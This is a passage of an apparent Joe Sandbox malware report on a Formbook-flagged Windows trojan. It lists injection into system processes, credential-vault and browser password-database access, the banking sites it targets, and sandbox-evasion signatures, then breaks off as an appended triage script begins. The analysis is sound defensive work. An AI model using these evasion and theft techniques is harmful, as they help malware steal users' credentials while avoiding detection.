            Source: 00000005.00000002.3365351743.00000000009E0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 (same rule metadata as the first match above)
            Source: 00000002.00000002.1809587289.00000000056F0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 (same rule metadata as the first match above)
            Source: 00000005.00000002.3360236201.0000000000880000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 (same rule metadata as the first match above)
            Source: 00000002.00000002.1808701497.0000000003590000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 (same rule metadata as the first match above)
            Source: 00000004.00000002.3365349150.0000000002A00000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 (same rule metadata as the first match above)
            Source: classification engine | Classification label: mal100.troj.spyw.evad.winEXE@7/2@16/6
            Source: C:\Users\user\Desktop\xBzBOQwywT.exe | Code function: 0_2_0044AF6C GetLastError,FormatMessageW
            Source: C:\Users\user\Desktop\xBzBOQwywT.exe | Code function: 0_2_004333BE GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,SetSystemPowerState
            Source: C:\Users\user\Desktop\xBzBOQwywT.exe | Code function: 0_2_00464EAE OpenProcess,GetLastError,GetLastError,GetCurrentThread,OpenThreadToken,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,AdjustTokenPrivileges,GetLastError,OpenProcess,AdjustTokenPrivileges,CloseHandle,TerminateProcess,GetLastError,CloseHandle
            Source: C:\Users\user\Desktop\xBzBOQwywT.exe | Code function: 0_2_0045D619 SetErrorMode,GetDiskFreeSpaceW,GetLastError,SetErrorMode
            Source: C:\Users\user\Desktop\xBzBOQwywT.exe | Code function: 0_2_004755C4 CreateToolhelp32Snapshot,Process32FirstW,__wsplitpath,_wcscat,__wcsicoll,Process32NextW,CloseHandle
            Source: C:\Users\user\Desktop\xBzBOQwywT.exe | Code function: 0_2_0046CB5F OleInitialize,CLSIDFromProgID,CLSIDFromString,CoCreateInstance,CoInitializeSecurity,_wcslen,CoCreateInstanceEx,CoTaskMemFree,CoSetProxyBlanket
            Source: C:\Users\user\Desktop\xBzBOQwywT.exe | Code function: 0_2_0043305F __swprintf,__swprintf,__wcsicoll,FindResourceW,LoadResource,LockResource,FindResourceW,LoadResource,SizeofResource,LockResource,CreateIconFromResourceEx
            Source: C:\Users\user\Desktop\xBzBOQwywT.exe | File created: C:\Users\user\AppData\Local\Temp\brawlys
            Source: C:\Users\user\Desktop\xBzBOQwywT.exe | Command line argument: Wu (0_2_0040D6B0)
            Source: xBzBOQwywT.exe | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
            Source: C:\Users\user\Desktop\xBzBOQwywT.exe | File read: C:\Users\desktop.ini
            Source: C:\Users\user\Desktop\xBzBOQwywT.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
            Source: RpcPing.exe, 00000005.00000002.3361983815.00000000009A6000.00000004.00000020.00020000.00000000.sdmp, RpcPing.exe, 00000005.00000002.3361983815.0000000000977000.00000004.00000020.00020000.00000000.sdmp, RpcPing.exe, 00000005.00000003.1989919315.0000000000977000.00000004.00000020.00020000.00000000.sdmp, RpcPing.exe, 00000005.00000002.3361983815.0000000000982000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
            Source: xBzBOQwywT.exe | ReversingLabs: Detection: 71%
            Source: C:\Users\user\Desktop\xBzBOQwywT.exe | File read: C:\Users\user\Desktop\xBzBOQwywT.exe
            Source: unknown | Process created: C:\Users\user\Desktop\xBzBOQwywT.exe "C:\Users\user\Desktop\xBzBOQwywT.exe"
            Source: C:\Users\user\Desktop\xBzBOQwywT.exe | Process created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\xBzBOQwywT.exe"
            Source: C:\Program Files (x86)\TIIMtmWBDOgKJqLyRAIwubPfyjAFihHzfKEdkzRHHZAfdvaWRkCDDxBDzJHtjEEfnvlrxdT\IpIaYUETnYWFH.exe | Process created: C:\Windows\SysWOW64\RpcPing.exe "C:\Windows\SysWOW64\RpcPing.exe"
            Source: C:\Windows\SysWOW64\RpcPing.exe | Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
            Source: C:\Users\user\Desktop\xBzBOQwywT.exe | Section loaded: apphelp.dll
            Source: C:\Users\user\Desktop\xBzBOQwywT.exe | Section loaded: wsock32.dll
            Source: C:\Users\user\Desktop\xBzBOQwywT.exe | Section loaded: version.dll
            Source: C:\Users\user\Desktop\xBzBOQwywT.exe | Section loaded: winmm.dll
            Source: C:\Users\user\Desktop\xBzBOQwywT.exe | Section loaded: mpr.dll
            Source: C:\Users\user\Desktop\xBzBOQwywT.exe | Section loaded: wininet.dll
            Source: C:\Users\user\Desktop\xBzBOQwywT.exe | Section loaded: userenv.dll
            Source: C:\Users\user\Desktop\xBzBOQwywT.exe | Section loaded: uxtheme.dll
            Source: C:\Users\user\Desktop\xBzBOQwywT.exe | Section loaded: windows.storage.dll
            Source: C:\Users\user\Desktop\xBzBOQwywT.exe | Section loaded: wldp.dll
            Source: C:\Users\user\Desktop\xBzBOQwywT.exe | Section loaded: kernel.appcore.dll
            Source: C:\Users\user\Desktop\xBzBOQwywT.exe | Section loaded: msdart.dll
            Source: C:\Users\user\Desktop\xBzBOQwywT.exe | Section loaded: sxs.dll
            Source: C:\Windows\SysWOW64\RpcPing.exe | Section loaded: winhttp.dll
            Source: C:\Windows\SysWOW64\RpcPing.exe | Section loaded: credui.dll
            Source: C:\Windows\SysWOW64\RpcPing.exe | Section loaded: sspicli.dll
            Source: C:\Windows\SysWOW64\RpcPing.exe | Section loaded: wininet.dll
            Source: C:\Windows\SysWOW64\RpcPing.exe | Section loaded: kernel.appcore.dll
            Source: C:\Windows\SysWOW64\RpcPing.exe | Section loaded: uxtheme.dll
            Source: C:\Windows\SysWOW64\RpcPing.exe | Section loaded: ieframe.dll
            Source: C:\Windows\SysWOW64\RpcPing.exe | Section loaded: iertutil.dll
            Source: C:\Windows\SysWOW64\RpcPing.exe | Section loaded: netapi32.dll
            Source: C:\Windows\SysWOW64\RpcPing.exe | Section loaded: version.dll
            Source: C:\Windows\SysWOW64\RpcPing.exe | Section loaded: userenv.dll
            Source: C:\Windows\SysWOW64\RpcPing.exe | Section loaded: wkscli.dll
            Source: C:\Windows\SysWOW64\RpcPing.exe | Section loaded: netutils.dll
            Source: C:\Windows\SysWOW64\RpcPing.exe | Section loaded: windows.storage.dll
            Source: C:\Windows\SysWOW64\RpcPing.exe | Section loaded: wldp.dll
            Source: C:\Windows\SysWOW64\RpcPing.exe | Section loaded: profapi.dll
            Source: C:\Windows\SysWOW64\RpcPing.exe | Section loaded: secur32.dll
            Source: C:\Windows\SysWOW64\RpcPing.exe | Section loaded: mlang.dll
            Source: C:\Windows\SysWOW64\RpcPing.exe | Section loaded: propsys.dll
            Source: C:\Windows\SysWOW64\RpcPing.exe | Section loaded: winsqlite3.dll
            Source: C:\Windows\SysWOW64\RpcPing.exe | Section loaded: vaultcli.dll
            Source: C:\Windows\SysWOW64\RpcPing.exe | Section loaded: wintypes.dll
            Source: C:\Windows\SysWOW64\RpcPing.exe | Section loaded: dpapi.dll
            Source: C:\Windows\SysWOW64\RpcPing.exe | Section loaded: cryptbase.dll
            Source: C:\Program Files (x86)\TIIMtmWBDOgKJqLyRAIwubPfyjAFihHzfKEdkzRHHZAfdvaWRkCDDxBDzJHtjEEfnvlrxdT\IpIaYUETnYWFH.exe | Section loaded: wininet.dll
            Source: C:\Program Files (x86)\TIIMtmWBDOgKJqLyRAIwubPfyjAFihHzfKEdkzRHHZAfdvaWRkCDDxBDzJHtjEEfnvlrxdT\IpIaYUETnYWFH.exe | Section loaded: mswsock.dll
            Source: C:\Program Files (x86)\TIIMtmWBDOgKJqLyRAIwubPfyjAFihHzfKEdkzRHHZAfdvaWRkCDDxBDzJHtjEEfnvlrxdT\IpIaYUETnYWFH.exe | Section loaded: dnsapi.dll
            Source: C:\Program Files (x86)\TIIMtmWBDOgKJqLyRAIwubPfyjAFihHzfKEdkzRHHZAfdvaWRkCDDxBDzJHtjEEfnvlrxdT\IpIaYUETnYWFH.exe | Section loaded: iphlpapi.dll
            Source: C:\Program Files (x86)\TIIMtmWBDOgKJqLyRAIwubPfyjAFihHzfKEdkzRHHZAfdvaWRkCDDxBDzJHtjEEfnvlrxdT\IpIaYUETnYWFH.exe | Section loaded: fwpuclnt.dll
            Source: C:\Program Files (x86)\TIIMtmWBDOgKJqLyRAIwubPfyjAFihHzfKEdkzRHHZAfdvaWRkCDDxBDzJHtjEEfnvlrxdT\IpIaYUETnYWFH.exe | Section loaded: rasadhlp.dll
            Source: C:\Users\user\Desktop\xBzBOQwywT.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\InProcServer32
            Source: Window Recorder | Window detected: More than 3 window changes detected
            Source: C:\Windows\SysWOW64\RpcPing.exe | Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\
            Source: xBzBOQwywT.exe | Static file information: File size 1332289 > 1048576
            Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: IpIaYUETnYWFH.exe, 00000004.00000000.1729593052.0000000000A0E000.00000002.00000001.01000000.00000005.sdmp, IpIaYUETnYWFH.exe, 00000006.00000002.3364160593.0000000000A0E000.00000002.00000001.01000000.00000005.sdmp
            Source: Binary string: wntdll.pdbUGP source: xBzBOQwywT.exe, 00000000.00000003.1592526943.00000000045A0000.00000004.00001000.00020000.00000000.sdmp, xBzBOQwywT.exe, 00000000.00000003.1591484081.0000000004740000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.1806399364.000000000339E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1715532753.0000000003000000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.1806399364.0000000003200000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1713483766.0000000002E00000.00000004.00000020.00020000.00000000.sdmp, RpcPing.exe, 00000005.00000002.3365897202.0000000002F50000.00000040.00001000.00020000.00000000.sdmp, RpcPing.exe, 00000005.00000003.1810471522.0000000000B94000.00000004.00000020.00020000.00000000.sdmp, RpcPing.exe, 00000005.00000002.3365897202.00000000030EE000.00000040.00001000.00020000.00000000.sdmp, RpcPing.exe, 00000005.00000003.1804899051.00000000009E7000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: RPCPing.pdbGCTL source: svchost.exe, 00000002.00000003.1772438382.0000000002C2B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1772421164.0000000002C1A000.00000004.00000020.00020000.00000000.sdmp, IpIaYUETnYWFH.exe, 00000004.00000003.2058526696.0000000000C5B000.00000004.00000001.00020000.00000000.sdmp
            Source: Binary string: wntdll.pdb source: xBzBOQwywT.exe, 00000000.00000003.1592526943.00000000045A0000.00000004.00001000.00020000.00000000.sdmp, xBzBOQwywT.exe, 00000000.00000003.1591484081.0000000004740000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, svchost.exe, 00000002.00000002.1806399364.000000000339E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1715532753.0000000003000000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.1806399364.0000000003200000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1713483766.0000000002E00000.00000004.00000020.00020000.00000000.sdmp, RpcPing.exe, RpcPing.exe, 00000005.00000002.3365897202.0000000002F50000.00000040.00001000.00020000.00000000.sdmp, RpcPing.exe, 00000005.00000003.1810471522.0000000000B94000.00000004.00000020.00020000.00000000.sdmp, RpcPing.exe, 00000005.00000002.3365897202.00000000030EE000.00000040.00001000.00020000.00000000.sdmp, RpcPing.exe, 00000005.00000003.1804899051.00000000009E7000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: RPCPing.pdb source: svchost.exe, 00000002.00000003.1772438382.0000000002C2B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1772421164.0000000002C1A000.00000004.00000020.00020000.00000000.sdmp, IpIaYUETnYWFH.exe, 00000004.00000003.2058526696.0000000000C5B000.00000004.00000001.00020000.00000000.sdmp
            Source: Binary string: svchost.pdb source: RpcPing.exe, 00000005.00000002.3367266886.000000000357C000.00000004.10000000.00040000.00000000.sdmp, RpcPing.exe, 00000005.00000002.3361983815.00000000008F2000.00000004.00000020.00020000.00000000.sdmp, IpIaYUETnYWFH.exe, 00000006.00000000.1874660765.00000000028AC000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000A.00000002.2101667197.000000002D4CC000.00000004.80000000.00040000.00000000.sdmp
            Source: Binary string: svchost.pdbUGP source: RpcPing.exe, 00000005.00000002.3367266886.000000000357C000.00000004.10000000.00040000.00000000.sdmp, RpcPing.exe, 00000005.00000002.3361983815.00000000008F2000.00000004.00000020.00020000.00000000.sdmp, IpIaYUETnYWFH.exe, 00000006.00000000.1874660765.00000000028AC000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000A.00000002.2101667197.000000002D4CC000.00000004.80000000.00040000.00000000.sdmp
            Source: C:\Users\user\Desktop\xBzBOQwywT.exe | Code function: 0_2_0040EBD0 LoadLibraryA,GetProcAddress
            Source: xBzBOQwywT.exe | Static PE information: real checksum: 0xa961f should be: 0x14a986
            Source: C:\Users\user\Desktop\xBzBOQwywT.exe | Code function: 0_2_00416CB5 push ecx; ret 0_2_00416CC8
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0041206B push ebx; ret 2_2_00412074
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_00402011 push edx; iretd 2_2_00402032
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_00407116 push esi; retf 2_2_00407117
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0041A9D8 push ebp; retf 2_2_0041A9D9
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_00403210 push eax; ret 2_2_00403212
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_00404334 push ebx; ret 2_2_00404335
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_004143D7 pushfd ; ret 2_2_004143D8
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_00401BBB pushad ; retf 2_2_00401BBE
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0041A45F push esp; ret 2_2_0041A502
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0041A463 push esp; ret 2_2_0041A502
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0041640E push edi; iretd 2_2_00416429
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0041A503 push esp; ret 2_2_0041A502
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_00401DE7 push ds; ret 2_2_00401DF3
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_00411594 push es; ret 2_2_00411596
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_00404E13 push edx; ret 2_2_00404E14
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_00406690 push esp; iretd 2_2_00406691
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0040A69A push ss; retf 2_2_0040A6A1
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_00411739 push edx; ret 2_2_0041173A
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_00401FC2 push eax; retf 2_2_00401FC5
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_00404FC3 push esp; iretd 2_2_00404FC4
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0320225F pushad ; ret 2_2_032027F9
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_032027FA pushad ; ret 2_2_032027F9
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_032309AD push ecx; mov dword ptr [esp], ecx 2_2_032309B6
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0320283D push eax; iretd 2_2_03202858
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0320135E push eax; iretd 2_2_03201369
            Source: C:\Program Files (x86)\TIIMtmWBDOgKJqLyRAIwubPfyjAFihHzfKEdkzRHHZAfdvaWRkCDDxBDzJHtjEEfnvlrxdT\IpIaYUETnYWFH.exe | Code function: 4_2_02C462F7 push ebx; ret 4_2_02C46300
            Source: C:\Program Files (x86)\TIIMtmWBDOgKJqLyRAIwubPfyjAFihHzfKEdkzRHHZAfdvaWRkCDDxBDzJHtjEEfnvlrxdT\IpIaYUETnYWFH.exe | Code function: 4_2_02C3924F push esp; iretd 4_2_02C39250
            Source: C:\Program Files (x86)\TIIMtmWBDOgKJqLyRAIwubPfyjAFihHzfKEdkzRHHZAfdvaWRkCDDxBDzJHtjEEfnvlrxdT\IpIaYUETnYWFH.exe | Code function: 4_2_02C3B3A2 push esi; retf 4_2_02C3B3A3
            Source: C:\Program Files (x86)\TIIMtmWBDOgKJqLyRAIwubPfyjAFihHzfKEdkzRHHZAfdvaWRkCDDxBDzJHtjEEfnvlrxdT\IpIaYUETnYWFH.exe | Code function: 4_2_02C488CF pushad ; retf B253h 4_2_02C48918
            Source: C:\Program Files (x86)\TIIMtmWBDOgKJqLyRAIwubPfyjAFihHzfKEdkzRHHZAfdvaWRkCDDxBDzJHtjEEfnvlrxdT\IpIaYUETnYWFH.exe | Code function: 4_2_02C3909F push edx; ret 4_2_02C390A0
            Source: C:\Users\user\Desktop\xBzBOQwywT.exe | Code function: 0_2_0047A330 IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed
            Source: C:\Users\user\Desktop\xBzBOQwywT.exe | Code function: 0_2_00434418 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput
            Source: C:\Users\user\Desktop\xBzBOQwywT.exe | Process information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\RpcPing.exe | Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX

            Malware Analysis System Evasion

Source: C:\Users\user\Desktop\xBzBOQwywT.exe | API/Special instruction interceptor: Address: 3EC1684
Source: C:\Windows\SysWOW64\RpcPing.exe | API/Special instruction interceptor: Address: 7FFBCB7AD324
Source: C:\Windows\SysWOW64\RpcPing.exe | API/Special instruction interceptor: Address: 7FFBCB7AD7E4
Source: C:\Windows\SysWOW64\RpcPing.exe | API/Special instruction interceptor: Address: 7FFBCB7AD944
Source: C:\Windows\SysWOW64\RpcPing.exe | API/Special instruction interceptor: Address: 7FFBCB7AD504
Source: C:\Windows\SysWOW64\RpcPing.exe | API/Special instruction interceptor: Address: 7FFBCB7AD544
Source: C:\Windows\SysWOW64\RpcPing.exe | API/Special instruction interceptor: Address: 7FFBCB7AD1E4
Source: C:\Windows\SysWOW64\RpcPing.exe | API/Special instruction interceptor: Address: 7FFBCB7B0154
Source: C:\Windows\SysWOW64\RpcPing.exe | API/Special instruction interceptor: Address: 7FFBCB7ADA44
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0327096E rdtsc
Source: C:\Windows\SysWOW64\RpcPing.exe | Window / User API: threadDelayed 9756
Source: C:\Users\user\Desktop\xBzBOQwywT.exe | Evasive API call chain: GetSystemTimeAsFileTime,DecisionNodes (graph_0-87679)
Source: C:\Users\user\Desktop\xBzBOQwywT.exe | API coverage: 3.7 %
Source: C:\Windows\SysWOW64\svchost.exe | API coverage: 0.7 %
Source: C:\Windows\SysWOW64\RpcPing.exe | API coverage: 2.8 %
Source: C:\Windows\SysWOW64\RpcPing.exe TID: 4128 | Thread sleep count: 217 > 30
Source: C:\Windows\SysWOW64\RpcPing.exe TID: 4128 | Thread sleep time: -434000s >= -30000s
Source: C:\Windows\SysWOW64\RpcPing.exe TID: 4128 | Thread sleep count: 9756 > 30
Source: C:\Windows\SysWOW64\RpcPing.exe TID: 4128 | Thread sleep time: -19512000s >= -30000s
Source: C:\Program Files (x86)\TIIMtmWBDOgKJqLyRAIwubPfyjAFihHzfKEdkzRHHZAfdvaWRkCDDxBDzJHtjEEfnvlrxdT\IpIaYUETnYWFH.exe TID: 4300 | Thread sleep time: -55000s >= -30000s
Source: C:\Program Files (x86)\TIIMtmWBDOgKJqLyRAIwubPfyjAFihHzfKEdkzRHHZAfdvaWRkCDDxBDzJHtjEEfnvlrxdT\IpIaYUETnYWFH.exe TID: 4300 | Thread sleep time: -30000s >= -30000s
Note: the negative values are relative delay intervals as the sandbox records them. For TID 4128 both count/time pairs divide to a constant 2000 per call (434000/217 and 19512000/9756), i.e. the same fixed-length sleep repeated in a loop, which is what trips both the call-count and the total-time thresholds.
Source: C:\Windows\SysWOW64\RpcPing.exe | Last function: Thread delayed (2 occurrences)
Source: C:\Users\user\Desktop\xBzBOQwywT.exe | Code function: 0_2_00452492 FindFirstFileW,Sleep,FindNextFileW,FindClose
Source: C:\Users\user\Desktop\xBzBOQwywT.exe | Code function: 0_2_00442886 FindFirstFileW,FindFirstFileW,FindNextFileW,FindClose,FindClose,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose
Source: C:\Users\user\Desktop\xBzBOQwywT.exe | Code function: 0_2_004788BD FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf
Source: C:\Users\user\Desktop\xBzBOQwywT.exe | Code function: 0_2_004339B6 GetFileAttributesW,FindFirstFileW,FindClose
Source: C:\Users\user\Desktop\xBzBOQwywT.exe | Code function: 0_2_0045CAFA FindFirstFileW,FindNextFileW,FindClose
Source: C:\Users\user\Desktop\xBzBOQwywT.exe | Code function: 0_2_00431A86 FindFirstFileW,FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindClose,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose
Source: C:\Users\user\Desktop\xBzBOQwywT.exe | Code function: 0_2_0044BD27 _wcscat,_wcscat,__wsplitpath,FindFirstFileW,CopyFileW,_wcscpy,_wcscat,_wcscat,lstrcmpiW,DeleteFileW,MoveFileW,CopyFileW,DeleteFileW,CopyFileW,FindClose,MoveFileW,FindNextFileW,FindClose
Source: C:\Users\user\Desktop\xBzBOQwywT.exe | Code function: 0_2_0045DE8F FindFirstFileW,FindClose
Source: C:\Users\user\Desktop\xBzBOQwywT.exe | Code function: 0_2_0044BF8B _wcscat,__wsplitpath,FindFirstFileW,_wcscpy,_wcscat,_wcscat,DeleteFileW,FindNextFileW,FindClose,FindClose
Source: C:\Windows\SysWOW64\RpcPing.exe | Code function: 5_2_004EC4E0 FindFirstFileW,FindNextFileW,FindClose
Source: C:\Users\user\Desktop\xBzBOQwywT.exe | Code function: 0_2_0040E500 GetVersionExW,GetCurrentProcess,GetNativeSystemInfo,FreeLibrary,FreeLibrary,FreeLibrary,GetSystemInfo,GetSystemInfo,FreeLibrary
Source: 0J030901P.5.dr | Binary or memory string: ms.portal.azure.comVMware20,11696494690
Source: 0J030901P.5.dr | Binary or memory string: discord.comVMware20,11696494690f
Source: 0J030901P.5.dr | Binary or memory string: AMC password management pageVMware20,11696494690
Source: 0J030901P.5.dr | Binary or memory string: outlook.office.comVMware20,11696494690s
Source: 0J030901P.5.dr | Binary or memory string: Interactive Brokers - GDCDYNVMware20,11696494690p
Source: 0J030901P.5.dr | Binary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696494690
Source: 0J030901P.5.dr | Binary or memory string: Interactive Brokers - EU WestVMware20,11696494690n
Source: 0J030901P.5.dr | Binary or memory string: interactivebrokers.comVMware20,11696494690
Source: 0J030901P.5.dr | Binary or memory string: netportal.hdfcbank.comVMware20,11696494690
Source: 0J030901P.5.dr | Binary or memory string: interactivebrokers.co.inVMware20,11696494690d
Source: 0J030901P.5.dr | Binary or memory string: account.microsoft.com/profileVMware20,11696494690u
Source: 0J030901P.5.dr | Binary or memory string: outlook.office365.comVMware20,11696494690t
Source: 0J030901P.5.dr | Binary or memory string: www.interactivebrokers.comVMware20,11696494690}
Source: 0J030901P.5.dr | Binary or memory string: microsoft.visualstudio.comVMware20,11696494690x
Source: 0J030901P.5.dr | Binary or memory string: Canara Change Transaction PasswordVMware20,11696494690^
Source: 0J030901P.5.dr | Binary or memory string: Test URL for global passwords blocklistVMware20,11696494690
Source: 0J030901P.5.dr | Binary or memory string: Interactive Brokers - NDCDYNVMware20,11696494690z
Source: RpcPing.exe, 00000005.00000002.3361983815.00000000008F2000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: 0J030901P.5.dr | Binary or memory string: trackpan.utiitsl.comVMware20,11696494690h
Source: 0J030901P.5.dr | Binary or memory string: tasks.office.comVMware20,11696494690o
Source: 0J030901P.5.dr | Binary or memory string: www.interactivebrokers.co.inVMware20,11696494690~
Source: 0J030901P.5.dr | Binary or memory string: Interactive Brokers - COM.HKVMware20,11696494690
Source: firefox.exe, 0000000A.00000002.2103029195.00000226AD45C000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll/
Source: 0J030901P.5.dr | Binary or memory string: dev.azure.comVMware20,11696494690j
Source: 0J030901P.5.dr | Binary or memory string: global block list test formVMware20,11696494690
Source: IpIaYUETnYWFH.exe, 00000006.00000002.3364445145.0000000000BF9000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllF
Source: 0J030901P.5.dr | Binary or memory string: turbotax.intuit.comVMware20,11696494690t
Source: 0J030901P.5.dr | Binary or memory string: bankofamerica.comVMware20,11696494690x
Source: 0J030901P.5.dr | Binary or memory string: Canara Transaction PasswordVMware20,11696494690}
Source: 0J030901P.5.dr | Binary or memory string: Canara Change Transaction PasswordVMware20,11696494690
Source: 0J030901P.5.dr | Binary or memory string: Interactive Brokers - HKVMware20,11696494690]
Source: 0J030901P.5.dr | Binary or memory string: Canara Transaction PasswordVMware20,11696494690x
Source: 0J030901P.5.dr | Binary or memory string: Interactive Brokers - EU East & CentralVMware20,11696494690
Source: 0J030901P.5.dr | Binary or memory string: secure.bankofamerica.comVMware20,11696494690|UE
Source: C:\Users\user\Desktop\xBzBOQwywT.exe | API call chain: ExitProcess graph end node (graph_0-86789)
Source: C:\Windows\SysWOW64\svchost.exe | Process information queried: ProcessInformation
Source: C:\Windows\SysWOW64\svchost.exe | Process queried: DebugPort
Source: C:\Windows\SysWOW64\RpcPing.exe | Process queried: DebugPort
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0327096E rdtsc
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_004175D3 LdrLoadDll
Source: C:\Users\user\Desktop\xBzBOQwywT.exe | Code function: 0_2_0045A370 BlockInput
Source: C:\Users\user\Desktop\xBzBOQwywT.exe | Code function: 0_2_0040D590 GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetModuleFileNameW,GetForegroundWindow,ShellExecuteW,GetForegroundWindow,ShellExecuteW
Source: C:\Users\user\Desktop\xBzBOQwywT.exe | Code function: 0_2_0040EBD0 LoadLibraryA,GetProcAddress
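The evasion verdict of this report rests on the signature lines in this section: the per-thread sleep counters, the rdtsc timing check, the ProcessDebugPort queries, the fs:[30h] PEB reads that follow, and the VMware-containing strings in the dropped file 0J030901P. The script below is an added example, not part of the Joe Sandbox report or of Joe Sandbox's own tooling. It parses signature lines in the run-together form of the text export and summarises them the way an analyst triaging many such reports would want: sleep counts and totals per thread against the thresholds the report prints, the per-call delay, which processes read the PEB and from how many distinct functions, and which dumps carry VM-identifying strings. The sample input is a subset of lines copied from this report. Two things are assumptions of the example, not statements the report makes: repeated "Thread sleep" lines for one thread are treated as later snapshots of the same counter (the largest is kept, not the sum), and a cleaned report may collapse identical lines into an "(N occurrences)" suffix, which the parser weights accordingly.

```python
"""Triage helper for the evasion and anti-debugging evidence in a Joe Sandbox text
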